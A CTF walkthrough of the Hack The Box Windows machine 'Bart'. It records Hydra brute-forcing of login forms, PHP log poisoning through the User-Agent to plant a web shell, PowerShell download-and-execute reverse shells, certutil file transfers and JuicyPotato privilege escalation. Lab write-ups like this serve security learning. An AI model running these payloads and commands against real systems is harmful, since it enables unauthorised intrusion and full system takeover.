Bart (Windows) - juicy potato priv esc, more hydra practice

80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Did not follow redirect to http://forum.bart.htb/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

gobuster won't work since 200 code messes up.

this is messing it up.

had to use python3 -u http://bart.htb -e php,aspx,asp,txt -x 500,404,403 instead

I had internet issue yesterday and couldn't get the /monitor/ link forever. I guess it's sometimes good to take a break.

login form found.

Observing traffic on burp

tried to log in as harvey with the password, potter (had to look up this one)

since csrf is set in the request, hydra didn't work well.

Added monitor.bart.htb to the etc/hosts file.

added internal-01.bart.htb to the hosts file as well.

Another login form found.

this time,no csrf!




hydra -l harvey -P ~/rockyou.txt internal-01.bart.htb http-post-form "/simple_chat/login_form.php:uname=^USER^&passwd=^PASS^&submit=Login:Invalid" -t 54

This didn't work...

hydra -l harvey -P ~/rockyou.txt http-post-form "/simple_chat/login_form.php:C=uname=^USER^&passwd=^PASS^&submit=Login:F=Password"

set up the burp to redirect the traffic:

tried it didn't work.

Another route:

cp /usr/share/metasploit-framework/data/wordlists/common_roots.txt .

it accepts password longer than 8 letters so,

cat common_roots.txt| awk '{if (length($0) > 7) print}' > passv2.txt

hydra -l harvey -P passv2.txt http-post-form "/simple_chat/login_form.php:uname=^USER^&passwd=^PASS^&submit=Login:Password"

omg I was typing the URL wrong the entire time!!

It looks like it's logging everytime someone visits the log.php

if we change the useragent to malicious code, we can execute?

<?php system($ REQUEST['cmd']); ?>

successfully executed

By changing te useragent to the code, it planted a code execution path with the file name (the file name can be anything)

  • changed useragent to the php code

  • changed file name to cmd.php in GET

now we can go to http://internal-01.bart.htb/log/cmd.php?cmd=whoami to execute it

now we can do reverse shell!

Let's use powershell

grab a ps1 from nishang and host it on python http server.

powershell IEX(New-Object Net.WebClient).downloadString('') 

Now we have our user shell.

executing whoami /priv shows that impersonateprivilege is enabled>

juicy potato!

transfer over the file:

certutil -urlcache -split -f C:\Users\Public\JuicyPotato.exe

now I copied the ps1 shell file and adjusted the port to 4444 and started another net cat listner

Now, I created a bat file that contains the following code:

powershell "IEX (New-Object Net.Webclient).downloadstring('')"

Then, I transferred the file over to the target machine and named it reverse.bat

certutil -urlcache -split -f C:\Users\Public\reverse.bat

Finally, I ran the following command (the -l 1111 is not doing anything here)

.\JuicyPotato.exe -t * -p .\reverse.bat -l 1111 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"	 

for CSLID value, I just used one of the may here

Some trouble shooting sites I used:

Last updated